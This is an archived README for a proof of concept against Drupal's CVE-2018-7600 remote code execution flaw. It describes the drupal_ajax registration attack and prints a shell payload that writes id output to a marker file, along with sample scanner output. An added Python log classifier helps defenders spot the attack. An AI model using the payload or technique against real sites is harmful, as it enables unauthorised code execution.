This repository has been archived by the owner on Jul 18, 2023. It is now read-only.

Proof-Of-Concept for CVE-2018-7600 / SA-CORE-2018-002

Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.

How it works

  1. It sends a packet to the drupal_ajax wrapper to register a user, which allows the user to use the exec markup and run bash. This PoC writes the user name and ID to abcde.txt.

    echo Name: $(id -un) UID: $(id -u) Groups: $(id -Gn) | tee abcde.txt
  2. Checks http*://example.com/abcde.txt

    [!] PROVIDED ONLY FOR EDUCATIONAL OR INFORMATION PURPOSES.
    [?] Enter file name (example: /root/file/hosts.txt): hosts.txt
    [+] https://example.com/ Possibly exploitable
    [~] Checking... https://example.com/abcde.text
    [+] https://example.com/ Exploitable
    [+] UID: 33 Name: www-data
    [+] Deleting... https://example.com/abcde.text
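
For defenders: the sample output above shows the PoC deleting abcde.txt after the check, so the access log is the durable evidence of the two steps. The following Python is an added example, not part of this repository's code; it assumes combined-format access logs, and the log lines, IP addresses and the `classify` function name are constructed for illustration.

```python
import re

# Constructed sample lines in combined log format (not from a real server).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Apr/2018:10:01:02 +0000] "POST /user/register?_wrapper_format=drupal_ajax HTTP/1.1" 200 512 "-" "python-requests/2.18"
203.0.113.7 - - [12/Apr/2018:10:01:03 +0000] "GET /abcde.txt HTTP/1.1" 200 41 "-" "python-requests/2.18"
198.51.100.9 - - [12/Apr/2018:10:02:00 +0000] "POST /user/register?_wrapper_format=drupal_ajax HTTP/1.1" 200 498 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Apr/2018:10:02:05 +0000] "GET /robots.txt HTTP/1.1" 200 1594 "-" "Mozilla/5.0"
192.0.2.44 - - [12/Apr/2018:10:03:00 +0000] "POST /user/register?_wrapper_format=drupal_ajax HTTP/1.1" 403 199 "-" "python-requests/2.18"
192.0.2.44 - - [12/Apr/2018:10:03:01 +0000] "GET /abcde.txt HTTP/1.1" 404 196 "-" "python-requests/2.18"
"""

# client IP, request method, request URL and response status of one log line
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) ')


def classify(log_text, marker="abcde.txt"):
    """Map client IP -> 'exploited' or 'attempted' for the PoC's two-step sequence.

    Step 1: a POST whose URL mentions drupal_ajax.
    Step 2: the same client then GETs the marker file the payload writes.
    A 200 on the marker means the command ran; any other status means the
    write failed (for example on a patched site) but the attempt was made.
    """
    posted = set()   # clients that have sent a drupal_ajax POST so far
    verdict = {}
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        ip, method, url, status = m["ip"], m["method"], m["url"], int(m["status"])
        filename = url.split("?", 1)[0].rsplit("/", 1)[-1]
        if method == "POST" and "drupal_ajax" in url:
            posted.add(ip)
        elif method == "GET" and ip in posted and filename == marker:
            if status == 200:
                verdict[ip] = "exploited"
            else:
                verdict.setdefault(ip, "attempted")
    return verdict


if __name__ == "__main__":
    for ip, result in classify(SAMPLE_LOG).items():
        print(ip, result)
```

Legitimate AJAX forms also use the drupal_ajax wrapper, which is why the POST alone is not flagged; the follow-up fetch of the marker file is what distinguishes the PoC. The marker name is a parameter because the payload's file name (`%s`) can be changed.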

Payloads

%s = file name

User ID, PID, and Group Payload

echo Name: $(id -un) UID: $(id -u) Groups: $(id -Gn) | tee %s

Thanks to

Provided only for educational or information purposes.